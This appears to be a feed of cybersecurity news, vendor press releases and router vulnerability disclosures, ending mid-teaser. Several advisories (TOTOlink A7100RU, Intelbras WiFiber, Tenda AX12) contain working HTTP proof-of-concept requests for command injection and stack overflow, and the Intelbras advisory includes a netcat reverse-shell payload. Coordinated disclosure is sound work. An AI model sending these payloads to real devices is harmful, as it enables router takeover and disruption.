Reality has a way of asserting itself, irrespective of any personal or commercial choices we make, good or bad. For example, just recently, the city services of Antwerp in Belgium were the victim of a highly disruptive cyberattack. 
As usual, everyone cried "foul play" and suggested that proper cybersecurity measures should have been in place. And again, as usual, it all happens a bit too late.

Reality has a way of asserting itself, irrespective of any personal or commercial choices we make, good or bad. For example, just recently, the city services of Antwerp in Belgium were the victim of a highly disruptive cyberattack.

As usual, everyone cried "foul play" and suggested that proper cybersecurity measures should have been in place. And again, as usual, it all happens a bit too late. There was nothing special or unique about the attack, and it wasn't the last of its kind either.

So why are we, in IT, still happily whistling into the wind and moving along as if nothing happened? Is everyone's disaster recovery plan really that good? Are all the security measures in place – and tested?

**Let's Do a Quick Recap (of What You Should Be Doing)**

First, cover the basics. Perform proper user training that includes all of the usual: password hygiene, restrictions on account sharing, and clear instructions not to open untrusted emails or to access unscrupulous websites. It's an inconvenient fact that human actions continue to be the weakest link in cyber defense, but it's a fact.

Thinking about the infrastructure side, consider proper asset auditing, because you can't protect what you don't know exists. As a next step, implement network segmentation to separate all traffic into the smallest possible divisions.

Simply put, if a server does not need to see or talk to another server, then that server shouldn't be connected to the same VLAN, no exceptions. Remote access should move from traditional VPN access to zero-trust networking alternatives.

Everything must be encrypted, even if communication is internal only. You never know what has already been breached, so someone can eavesdrop where you least expect it.

Finally, don't let users randomly plug devices into your network. Lock ports and restrict Wi-Fi access to known devices. Users will complain, but that is just part of the tradeoff. Either way, exceptions should be kept to a minimum.

**Patching Your Servers Really Matters**

Moving on to servers, the key advice is to keep everything updated via patching. That's true for exposed, public-facing servers, such as web servers – but it's equally as true for the print server tucked away in the closet.

An unpatched server is a vulnerable server and it only takes one vulnerable server to bring down the fortress. If patching is too disruptive to do daily, look to alternative methods such as live patching and use it everywhere you can.

Hackers are crafty individuals and they don't need you to make it easier for them, so plug as many holes as possible – as fast as possible. Thanks to live patching, you don't have to worry about prioritizing vulnerabilities to patch, because you can just patch them all. There is no downside.

**Take a Proactive Approach**

If a server no longer has a reason to exist, decommission it or destroy the instance. Whether it's a container, VM, instance, or a node, you need to act ASAP. If you don't, you'll end up forgetting about it until it is breached. At that point, it's too late.

So, you should maintain a proactive approach. Keep up with the latest threats and security news. While some vulnerabilities have a disproportionate share of attention due to being "named" vulnerabilities, sometimes it's one of the countless "regular" vulnerabilities that hits the hardest. You can use a vulnerability management tool to help with this.

Put in place a disaster recovery plan. Start from the simple premise of "what if we woke up tomorrow and none of our IT worked?"

Answer these questions: How quickly can I get barebone services up and running? How long does it take to restore the entire data backup? Are we testing the backups regularly? Is the deployment process for services properly documented… even if it's a hardcopy of the ansible scripts? What are the legal implications of losing our systems, data, or infrastructure for several weeks?

**Most Importantly: Act Now, Don't Delay**

If you struggle with any of the answers to the questions above, it means you have work to do – and that's not something you should delay.

As an organization, you want to avoid getting into a position where your systems are down, your customers are going to your competitor's website, and your boss is demanding answers – while all you have to offer is a blank stare and a scared look on your face.

That said, it's not a losing battle. All the questions we posed can be answered, and the practices described above – while only just scratching the very surface of everything that should be done – are a good starting point.

If you haven't yet looked into it… well, the best starting point is right now – before an incident happens.

_This article is written and sponsored by_ _TuxCare__, the industry leader in enterprise-grade_ _Linux automation__. TuxCare offers unrivaled levels of efficiency for developers, IT security managers, and_ _Linux server administrators_ _seeking to affordably enhance and simplify their cybersecurity operations. TuxCare's Linux kernel live security patching, and standard and_ _enhanced support services_ _assist in securing and supporting over one million production workloads._

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Cyber Security Is Not a Losing Game – If You Start Right Now

TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the wscDisabled parameter in the setting/setWiFiWpsCfg function.

**TOTOlink A7100RU Command injection vulnerability****Overview**

*   Manufacturer's website information：http://totolink.net/
*   Firmware download address ： http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**2.Vulnerability details**

The program passes the content obtained by the wscdisabled parameter to the V5 parameter, and then brings V5 into UCI\_ Set\_ STR function

Format the A4 matched content into V11 through snprintf function, and then bring V11 into cstesystem function

The function directly brings user input into the execv function, which has a command injection vulnerability

**3.Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V7.4cu.2313\_B20191024
2.  Attack with the following overflow POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 79
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/adm/status.asp?timestamp=1647872753309
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647872744:2
    Connection: close
    
    {"topicurl":"setting/setWiFiWpsCfg",
    "wscDisabled":"1$(ls>/tmp/123;)"}
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

CVE-2022-46634: IOT_vuln/TOTOLink/A7100RU/7 at main · EPhaha/IOT_vuln

TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the wscDisabled parameter in the setting/setWiFiSignalCfg function.

**TOTOlink A7100RU Command injection vulnerability****Overview**

*   Manufacturer's website information：http://totolink.net/
*   Firmware download address ： http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**2.Vulnerability details**

The program passes the content obtained by the wscdisabled parameter to the V3 parameter, then assigns V3 to V6, and finally brings V6 to UCI\_ Set\_ In str function

Format the A4 matched content into V11 through snprintf function, and then bring V11 into cstesystem function

The function directly brings user input into the execv function, which has a command injection vulnerability

**3.Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V7.4cu.2313\_B20191024
2.  Attack with the following overflow POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 79
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/adm/status.asp?timestamp=1647872753309
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647872744:2
    Connection: close
    
    {"topicurl":"setting/setWiFiSignalCfg",
    "wscDisabled":"1$(ls>/tmp/123;)"}
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

CVE-2022-46631: IOT_vuln/TOTOLink/A7100RU/6 at main · EPhaha/IOT_vuln

New research also analyzes the commoditization of adversary-in-the-middle attacks, JavaScript obfuscation in exploit kits, and a malware family with Gothic Panda ties.

**SEATTLE – December 15, 2022** **–** WatchGuard® Technologies, a global leader in unified cybersecurity, today released its latest quarterly Internet Security Report, detailing the top malware trends, and network and endpoint security threats analyzed by WatchGuard Threat Lab researchers in Q3 2022. Key findings from the data reveal the quarter’s top malware threat was detected exclusively over encrypted connections, ICS attacks are maintaining popularity, LemonDuck malware is evolving beyond cryptominer delivery, a Minecraft cheat engine is delivering a malicious payload, and much more.“We can’t emphasize enough how important it is for HTTPS inspection to be enabled, even if it requires some tuning and exceptions to do properly. The majority of malware arrives over encrypted HTTPS, and not inspecting it means you’re missing those threats,” said Corey Nachreiner, chief security officer at WatchGuard Technologies. “Rightfully so, the big prizes for attackers like an Exchange server or a SCADA management system deserve extraordinary attention as well this quarter. When a patch is available, it’s important to update immediately, as attackers will eventually benefit from any organization that has yet to implement the latest patch.” 

Other key findings from the Q3 Internet Security Report include:

*   The vast majority of malware arriving over encrypted connections – Although Agent.IIQ placed third in the normal top 10 malware list this quarter, it landed in the #1 spot at the top of the encrypted malware list for Q3. In fact, if you look at the detections for it on both of these lists, you’ll see all Agent.IIQ detections come from encrypted connections. In Q3, if a Firebox was inspecting encrypted traffic, 82% of the malware it detected was through that encrypted connection, leaving only a meager 18% detected without encryption. If you’re not inspecting encrypted traffic on your Firebox, it’s very likely that this average ratio remains true, and you are missing a huge portion of malware. Hopefully, you at least have endpoint protection implemented for a chance to catch it further down the cyber kill chain.

*   ICS and SCADA systems remain trending attack targets – New to the top 10 network attacks list this quarter is a SQL injection-type attack that affected several vendors. One of these companies is Advantech, whose WebAccess portal is used for SCADA systems across a variety of critical infrastructure. Another serious exploit in Q3, which also appeared in the top five network attacks by volume, involved Schneider Electric's U.motion Builder software versions 1.2.1 and prior. This is a stark reminder that attackers aren’t quietly waiting for an opportunity – rather, they are actively seeking system compromise wherever possible.
*   Exchange server vulnerabilities continuing to pose risk – The most recent CVE among the Threat Lab’s new signatures this quarter, CVE-2021-26855, is a Microsoft Exchange Server Remote Code Execution (RCE) vulnerability for on-premises servers. This RCE vulnerability was given a 9.8 CVE score and is known to have been exploited. The date and severity of CVE-2021-26855 should also ring a bell, as it is one of the exploits used by the group HAFNIUM. While most Exchange servers affected by it have likely been patched by now, _most_ does not equate to _all_. Therefore, risks remain.

*   Threat actors targeting seekers of free software – Fugrafa downloads malware that injects malicious code. This quarter, the Threat Lab examined a sample of it that was found in a cheat engine for the popular game Minecraft. While the file shared primarily on Discord claims to be the Minecraft cheat engine Vape V4 Beta, that’s not all it contains. Agent.FZUW has some similarities to Variant.Fugrafa, but instead of installation through a cheat engine, the file itself pretends to have cracked software. The Threat Lab discovered this particular sample has connections with Racoon Stealer, a cryptocurrency hacking campaign used to hijack account information from cryptocurrency exchange services.

*   LemonDuck malware evolving beyond cryptominer delivery – Even with a dip in total blocked or tracked malware domains for the third quarter of 2022, it is easy to see that attacks on unsuspecting users are still high. With three new additions to the top malware domains list – two of which were former LemonDuck malware domains, and the other part of an Emotet classified domain – Q3 saw more malware and attempted malware sites that were newer domains than usual. This trend will change and modify with the landscape of cryptocurrency in turmoil as attackers look for other venues to trick users. Keeping DNS protection enabled is a way to monitor and block unsuspecting users from allowing malware or other serious issues into your organization.

*   JavaScript obfuscation in exploit kits – Signature 1132518, a generic vulnerability for detecting JavaScript Obfuscation attacks against browsers, was the only new addition to the most-widespread network attack signatures list this quarter. JavaScript is a common vector for attacking users and threat actors use JavaScript-based exploit kits all the time – in malvertising, watering hole and phishing attacks, just to name a few. As the defensive fortifications have improved on browsers, so have attackers’ ability to obfuscate malicious JavaScript code.

*   Anatomy of commoditized adversary-in-the-middle attacks – While multi-factor authentication (MFA) is undeniably the single best technology you can deploy to protect against the bulk of authentication attacks, it is not on its own a silver bullet against all attack vectors. Cyber adversaries have made this clear with the rapid rise and commoditization of adversary-in-the-middle (AitM) attacks, and the Threat Lab’s deep dive on EvilProxy, the top security incident of Q3, shows just how malicious actors are beginning to pivot to more sophisticated AitM techniques. Like the Ransomware as a Service offering made popular in recent years, the September 2022 release of an AitM toolkit called EvilProxy has significantly lowered the barrier of entry for what was previously a sophisticated attack technique. From a defensive standpoint, successfully combatting this kind of AitM attack technique requires a mix of both technical tools and user awareness.
*   A malware family with Gothic Panda ties – The Threat Lab’s Q2 2022 report described how Gothic Panda—a state-sponsored threat actor connected to China’s Ministry of State Security—was known to use one of the top malware detections from that quarter. Interestingly, the top encrypted malware list for Q3 includes a malware family called Taidoor, which was not only created by Gothic Panda but has only been seen used by Chinese government cyber actors. While this malware typically focuses on targets in Japan and Taiwan in general, the Generic.Taidoor sample analyzed this quarter was found primarily targeting organizations in France, suggesting that some Fireboxes in this region may have detected and blocked parts of a state-sponsored cyberattack.
*   New ransomware and extortion groups in the wild –Additionally this quarter, the Threat Lab is excited to announce a new, concerted effort to track current ransomware extortion groups and build out its threat intelligence capabilities to provide more ransomware-related information in future reports. LockBit tops the list for Q3 with over 200 public extortions on their dark web page – nearly four times more than that of Basta, the second most prolific ransomware group WatchGuard observed this quarter.WatchGuard’s quarterly research reports are based on anonymized Firebox Feed data from active WatchGuard Fireboxes whose owners have opted to share data in direct support of the Threat Lab’s research efforts. In Q3, WatchGuard blocked a total of more than 17.3 million malware variants (211 per device) and more than 2.3 million network threats (28 per device). The full report includes details on additional malware and network trends from Q3 2022, recommended security strategies, critical defense tips for businesses of all sizes and in any sector, and more.
    
    For a detailed view of WatchGuard’s research, read the complete Q3 2022 Internet Security Report here.
    
    About WatchGuard Technologies, Inc.
    
    WatchGuard® Technologies, Inc. is a global leader in unified cybersecurity. Our Unified Security Platform® approach is uniquely designed for managed service providers to deliver world-class security that increases their business scale and velocity while also improving operational efficiency. Trusted by more than 17,000 security resellers and service providers to protect more than 250,000 customers, the company’s award-winning products and services span network security and intelligence, advanced endpoint protection, multi-factor authentication, and secure Wi-Fi. Together, they offer five critical elements of a security platform: comprehensive security, shared knowledge, clarity & control, operational alignment, and automation. The company is headquartered in Seattle, Washington, with offices throughout North America, Europe, Asia Pacific, and Latin America. To learn more, visit WatchGuard.com.
    

For additional information, promotions and updates, follow WatchGuard on Twitter (@WatchGuard), on Facebook, or on the LinkedIn Company page. Also, visit our InfoSec blog, Secplicity, for real-time information about the latest threats and how to cope with them at www.secplicity.org. 

Subscribe to The 443 – Security Simplified podcast at Secplicity.org, or wherever you find your favorite podcasts.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

WatchGuard Threat Lab Report Finds Top Threat Arriving Exclusively Over Encrypted Connections

Intelbras WiFiber 120AC inMesh version 1.1-220216 suffers from an authenticated command injection vulnerability.

    CyberDanube Security Research 20221009-0-------------------------------------------------------------------------------                 title| Authenticated Command Injection              product| Intelbras WiFiber 120AC inMesh   vulnerable version| 1.1-220216        fixed version| 1-1-220826           CVE number| CVE-2022-40005               impact| High             homepage| https://www.intelbras.com                found| 2022-08-01                   by| T. Weber (Office Vienna)                     | CyberDanube Security Research                     | Vienna | St. Pölten                     |                     | https://www.cyberdanube.com------------------------------------------------------------------------------- Vendor description------------------------------------------------------------------------------- "We are Intelbras. A company that for 45 years has been offering innovativesolutions in security, networks, communication and energy. Our dream began tocome to life there in 1976, in the city of São José, having originated from anINspiration and a promising idea: to manufacture PABX centrals. During the80's, we surprised the market with the launch of the first PABX developed withnational technology, a product that showed everyone our innovative DNA. The 90swere marked by the consolidation of the company in the telecommunicationssegment and we became leaders in the PABX and telephone terminals segment. Theturn of the millennium represented the search for greater connection andproximity to people, something that is in total harmony with our philosophy tothis day. More consolidated in the market, in 2010 we opened 3 manufacturingunits, located in Santa Rita do Sapucaí/MG, Manaus/AM and São José/SC.We reached our 45th birthday having reached a historic milestone: we have beena company listed on the B3 since February 2021. Our trajectory so far has beenINnovative, INtelligent and INSpiring. We saw innovation, which is part of ourDNA, increasingly present in our daily lives. And it was only possible towrite a story so full of achievements because employees, partners and customerswere close and believed in us."Source: https://www.intelbras.com/en/institutional/who-we-areVulnerable versions------------------------------------------------------------------------------- WiFiber 120AC inMesh / 1.1-220216Vulnerability overview------------------------------------------------------------------------------- 1) Authenticated Command Injection (CVE-2022-40005)The web server of the device is prone to an authenticated command injection.It allows an attacker to gain full access to the underlying operating system ofthe device with all implications. If such a device is acting as key device inan industrial network, more extensive damage in the corresponding network canbe done by an attacker.Proof of Concept------------------------------------------------------------------------------- 1) Authenticated Command Injection (CVE-2022-40005)The web server is prone to an authenticated command injection via POSTparameters. The following proof-of-concept shows how to inject the command"ls /" to the system which gets executed in the background:=============================================================================== POST /boaform/formPing6 HTTP/1.1Host: 192.168.3.147User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 87Origin: http://192.168.3.147Connection: closeReferer: http://192.168.3.147/ping6.aspUpgrade-Insecure-Requests: 1pingAddr=%3Bls+%2F%3B&wanif=65535&go=+Ir&submit-url=%2Fping6.asp&postSecurityFlag=39908 =============================================================================== The following commands can be used to open a reverse shell:"rm -f /tmp/f""mkfifo /tmp/f""cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.3.138 8889 >/tmp/f"Those commands were sent via a crafted POST request:=============================================================================== POST /boaform/formTracert HTTP/1.1Host: 192.168.3.147User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 255Origin: http://192.168.3.147Connection: closeReferer: http://192.168.3.147/tracert.aspUpgrade-Insecure-Requests: 1proto=0&traceAddr=%3Brm+-f+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.3.138+8889+%3E%2Ftmp%2Ff%3B&trys=3&timeout=5&datasize=56&dscp=0&maxhop=30&wanif=65535&go=+Ir&submit-url=%2Ftracert.asp&postSecurityFlag=29290 =============================================================================== The vulnerability was manually verified on an emulated device by using theMEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).Solution------------------------------------------------------------------------------- Update to firmware version 1-1-220826.https://backend.intelbras.com/sites/default/files/2022-08/ONT_Wifiber_120_AC_Vers%C3%A3o_1-1-220826.zip Workaround------------------------------------------------------------------------------- NoneRecommendation------------------------------------------------------------------------------- CyberDanube recommends Intelbras customers to upgrade the firmware to thelatest version available.Contact Timeline------------------------------------------------------------------------------- 2022-08-02: Contacting Intelbras via suporte@intelbras.com.br.2022-08-03: Request from Intelbras to send the advisory tocsirt@intelbras.com.br; Sent the advisory to this address.2022-08-30: Asked for status update; Vendor answered that the new firmware             version has been released the day before. Set the disclosure date             to 2022-10-03 (60 days policy).2022-10-03: Shifted disclosure date to 2022-10-09 due to sick colleagues.2022-10-09: Coordinated disclosure of advisory.Web: https://www.cyberdanube.comTwitter: https://twitter.com/cyberdanubeMail: research at cyberdanube dot comEOF T. Weber / @2022On 09.10.22 17:21, Thomas Weber wrote:> CyberDanube Security Research 20221009-0> ------------------------------------------------------------------------------- >>                title| Authenticated Command Injection>              product| Intelbras WiFiber 120AC inMesh>   vulnerable version| 1.1-220216>        fixed version| 1-1-220826>           CVE number|>               impact| High>             homepage| https://www.intelbras.com>                found| 2022-08-01>                   by| T. Weber (Office Vienna)>                     | CyberDanube Security Research>                     | Vienna | St. Pölten>                     |>                     | https://www.cyberdanube.com> ------------------------------------------------------------------------------- >>> Vendor description> ------------------------------------------------------------------------------- >> "We are Intelbras. A company that for 45 years has been offering > innovative> solutions in security, networks, communication and energy. Our dream > began to> come to life there in 1976, in the city of São José, having originated > from an> INspiration and a promising idea: to manufacture PABX centrals. During > the> 80's, we surprised the market with the launch of the first PABX > developed with> national technology, a product that showed everyone our innovative > DNA. The 90s> were marked by the consolidation of the company in the telecommunications> segment and we became leaders in the PABX and telephone terminals > segment. The> turn of the millennium represented the search for greater connection and> proximity to people, something that is in total harmony with our > philosophy to> this day. More consolidated in the market, in 2010 we opened 3 > manufacturing> units, located in Santa Rita do Sapucaí/MG, Manaus/AM and São José/SC.> We reached our 45th birthday having reached a historic milestone: we > have been> a company listed on the B3 since February 2021. Our trajectory so far > has been> INnovative, INtelligent and INSpiring. We saw innovation, which is > part of our> DNA, increasingly present in our daily lives. And it was only possible to> write a story so full of achievements because employees, partners and > customers> were close and believed in us.">> Source: https://www.intelbras.com/en/institutional/who-we-are>>> Vulnerable versions> ------------------------------------------------------------------------------- >> WiFiber 120AC inMesh / 1.1-220216>>> Vulnerability overview> ------------------------------------------------------------------------------- >> 1) Authenticated Command Injection> The web server of the device is prone to an authenticated command > injection.> It allows an attacker to gain full access to the underlying operating > system of> the device with all implications. If such a device is acting as key > device in> an industrial network, more extensive damage in the corresponding > network can> be done by an attacker.>>> Proof of Concept> ------------------------------------------------------------------------------- >> 1) Authenticated Command Injection> The web server is prone to an authenticated command injection via POST> parameters. The following proof-of-concept shows how to inject the > command> "ls /" to the system which gets executed in the background:>> =============================================================================== >> POST /boaform/formPing6 HTTP/1.1> Host: 192.168.3.147> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 > Firefox/91.0> Accept: > text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8> Accept-Language: de,en-US;q=0.7,en;q=0.3> Accept-Encoding: gzip, deflate> Content-Type: application/x-www-form-urlencoded> Content-Length: 87> Origin: http://192.168.3.147> Connection: close> Referer: http://192.168.3.147/ping6.asp> Upgrade-Insecure-Requests: 1>> pingAddr=%3Bls+%2F%3B&wanif=65535&go=+Ir&submit-url=%2Fping6.asp&postSecurityFlag=39908 >> =============================================================================== >>> The following commands can be used to open a reverse shell:>> "rm -f /tmp/f"> "mkfifo /tmp/f"> "cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.3.138 8889 >/tmp/f">> Those commands were sent via a crafted POST request:>> =============================================================================== >> POST /boaform/formTracert HTTP/1.1> Host: 192.168.3.147> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 > Firefox/91.0> Accept: > text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8> Accept-Language: de,en-US;q=0.7,en;q=0.3> Accept-Encoding: gzip, deflate> Content-Type: application/x-www-form-urlencoded> Content-Length: 255> Origin: http://192.168.3.147> Connection: close> Referer: http://192.168.3.147/tracert.asp> Upgrade-Insecure-Requests: 1>> proto=0&traceAddr=%3Brm+-f+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.3.138+8889+%3E%2Ftmp%2Ff%3B&trys=3&timeout=5&datasize=56&dscp=0&maxhop=30&wanif=65535&go=+Ir&submit-url=%2Ftracert.asp&postSecurityFlag=29290 >> =============================================================================== >>> The vulnerability was manually verified on an emulated device by using > the> MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).>>> Solution> ------------------------------------------------------------------------------- >> Update to firmware version 1-1-220826.>> https://backend.intelbras.com/sites/default/files/2022-08/ONT_Wifiber_120_AC_Vers%C3%A3o_1-1-220826.zip >>>> Workaround> ------------------------------------------------------------------------------- >> None>>> Recommendation> ------------------------------------------------------------------------------- >> CyberDanube recommends Intelbras customers to upgrade the firmware to the> latest version available.>>> Contact Timeline> ------------------------------------------------------------------------------- >> 2022-08-02: Contacting Intelbras via suporte@intelbras.com.br.> 2022-08-03: Request from Intelbras to send the advisory to> csirt@intelbras.com.br; Sent the advisory to this address.> 2022-08-30: Asked for status update; Vendor answered that the new > firmware>             version has been released the day before. Set the > disclosure date>             to 2022-10-03 (60 days policy).> 2022-10-03: Shifted disclosure date to 2022-10-09 due to sick colleagues.> 2022-10-09: Coordinated disclosure of advisory.>>> Web: https://www.cyberdanube.com> Twitter: https://twitter.com/cyberdanube> Mail: research at cyberdanube dot com>> EOF T. Weber / @2022>

Intelbras WiFiber 120AC inMesh 1.1-220216 Command Injection

The login password of the web administrative dashboard in Arcadyan Wifi routers VRV9506JAC23 is sent in cleartext, allowing an attacker to sniff and intercept traffic to learn the administrative credentials to the router.

Vulnerabilities found on Arcadyan Routers - Asher Davila L.

The two vulnerabilities were found by **Asher Davila L.** in Arcadyan wireless modems with model number VRV9506JAC23. It is probable that they are also present in other Arcadyan models as well because their web interfaces are similar and they have common features. The following are the two vulnerabilities we found:

*   CVE-2020-9420: Cleartext transmission of sensitive information
*   CVE-2020-9419: Stored cross-site scripting

In combination, these vulnerabilities pose a significant risk: Malicious users on the network can sniff wireless modem user credentials. They can then use the sniffed credentials to access the web interface and inject persistent malicious scripts into it. It is recommended that users contact their ISPs to request a router that implements the usage of secure protocols such as HTTPS instead of HTTP.

According to Shodan, there are at least 19,887 Arcadyan devices exposed to the internet in countries such as Japan, China, United States, Germany, United Kingdom.

**Figure 1. Shodan Search**

**Figure 2. Countries where Arcadyan routers are present according to Shodan**

Additionally, some of the largest ISPs (Internet Service Providers) in Latin America and Europe provide this device to their customers as their default modem. e.g, this router is distributed by Telmex, the largest ISP of Mexico.

**Disclosure Timeline**

*   November 11, 2019 - contacted the US CERT to report the vulnerability.
*   February 25, 2020 - contacted a partner that is a vendor of the product. The vendor provided a contact to report the vulnerability.
*   February 25, 2020 - communicated the vulnerabilities to the manufacturer.

**Conclusion**

In summary, the Arcadyan wireless modem has two vulnerabilities that can be used together to compromise the device and inject malicious code. The first is the use of an insecure protocol—HTTP instead of HTTPS—which allows attackers to capture credentials. The second vulnerability is the lack of input validation, which allows attackers to inject malicious code.

CVE-2020-9420: Vulnerabilities found on Arcadyan Routers - Asher Davila L.

Tenda AX12 v22.03.01.21_CN was discovered to contain a stack overflow via the ssid parameter at /goform/fast_setting_wifi_set .

**Vulnerability description**

Affect device：Tenda-AX12 V22.03.01.21\_CN(https://www.tenda.com.cn/download/detail-3237.html)

Vulnerability Type: Stack overflow

Impact: Denial of Service(DoS)

**Vulnerability cause**

In the /goform/fast\_setting\_wifi\_set interface, the ssid parameter and the sprintf function passed through it do not limit the length, which will cause stack overflow and achieve the effect of a DoS denial of service attack.

**POC**

Poc of Denial of Service(DoS):

POST /goform/fast\_setting\_wifi\_set HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 10
Origin: http://192.168.0.1
Connection: close
Cookie: password=xxxxxxxxxx
Referer: http://192.168.0.1/main.html

ssid=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa+1000\*a

CVE-2022-45979: IOT-CVE/Tenda/AX12/4 at master · The-Itach1/IOT-CVE

As the holiday season approaches, online shopping and gift-giving are at the top of many people's to-do lists. But before you hit the "buy" button, it's important to remember that this time of year is also the peak season for cybercriminals.
In fact, cybercriminals often ramp up their efforts during the holidays, taking advantage of the influx of online shoppers and the general hustle and bustle

DNS Security / Online Security

As the holiday season approaches, online shopping and gift-giving are at the top of many people's to-do lists. But before you hit the "buy" button, it's important to remember that this time of year is also the peak season for cybercriminals.

In fact, cybercriminals often ramp up their efforts during the holidays, taking advantage of the influx of online shoppers and the general hustle and bustle of the season

Don't let cybercriminals steal your holiday cheer – follow our simple steps to protect yourself and your personal information while shopping online, completing work tasks, or simply browsing the web.

****Check everything twice****

It's common for scammers to lure people in with fake deals and offers during the holiday season. They may promise deep discounts on popular items or claim to have limited-time offers that are too good to pass up.

They may also create fake websites or emails that look like they are from legitimate companies to trick people into giving them sensitive information, such as credit card numbers or bank account information.

Here are some tips to help you be more cautious and do your research before making any purchases or providing personal information:

*   Always check the URL of the website you're visiting. If it starts with "HTTPS," the site uses encryption to protect your data.
*   Be on the lookout for spelling mistakes in the text or website name. These are often signs that something sketchy is going on.
*   Remember that phishing and other scams tend to increase around Black Friday and the Christmas holidays. Only visit websites that you trust.
*   Don't assume that your personal or corporate email is immune to scams. Your junk folder may contain emails with dangerous links, and so might your inbox.
*   One of the easiest ways for cybercriminals to access your online accounts is by guessing your password. To protect yourself, it's important to use a strong and unique password for every online account you have.

**BONUS:** If you're unsure whether a link is safe, consider using a DNS security tool like SafeDNS. It blocks potentially dangerous links, allowing you to browse with confidence. As a bonus, use promo code "Safe\_Xmas10" to save 10% on Business & Home plans.

****Baby, it's cold outside****

Hackers don't care about who you are or what you do. They're only interested in taking advantage of any weakness they can find. That's why it's important to be cautious when opening emails, especially at work. If you receive a message from someone you don't know, or if you're not expecting a delivery from the sender of an email, be sure to carefully inspect the message before clicking any links. If in doubt, contact your IT department for guidance. Remember, it's better to be safe than sorry!

****Stay on the 'good' list****

As you enjoy the holiday season, don't let your guard down when it comes to cybersecurity. Follow your usual threat protection methods to keep yourself and your loved ones safe online.

This means using multifactor authentication, creating strong passwords, and ensuring that your antivirus software and DNS security service are up-to-date. If you're using your company's WiFi network, make sure your employer is taking the necessary precautions to protect employees. You can also use a web filter to protect your personal WiFi network.

Stay vigilant and keep an eye on your credit card statements to ensure that your information hasn't been stolen. Remember that phishing attacks can come in many forms, including emails, websites, social media messages, texts, and even calls or QR codes.

Stay safe by using a DNS security service like SafeDNS. Use promo code 'Safe\_Xmas10' at signup to get 10% off any Business or Home plan. Happy holidays!"

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Keep Your Grinch at Bay: Here's How to Stay Safe Online this Holiday Season

By Deeba Ahmed
At the moment, Zombinder is focusing entirely on Android apps but the service operators are offering Windows apps binding services.
This is a post from HackRead.com Read the original post: Zombinder on Dark Web Lets Hackers Add Malware to Legit Apps

ThreatFabric’s security researchers have reported a new **dark web** platform through which cybercriminals can easily add malware to legitimate Android applications.

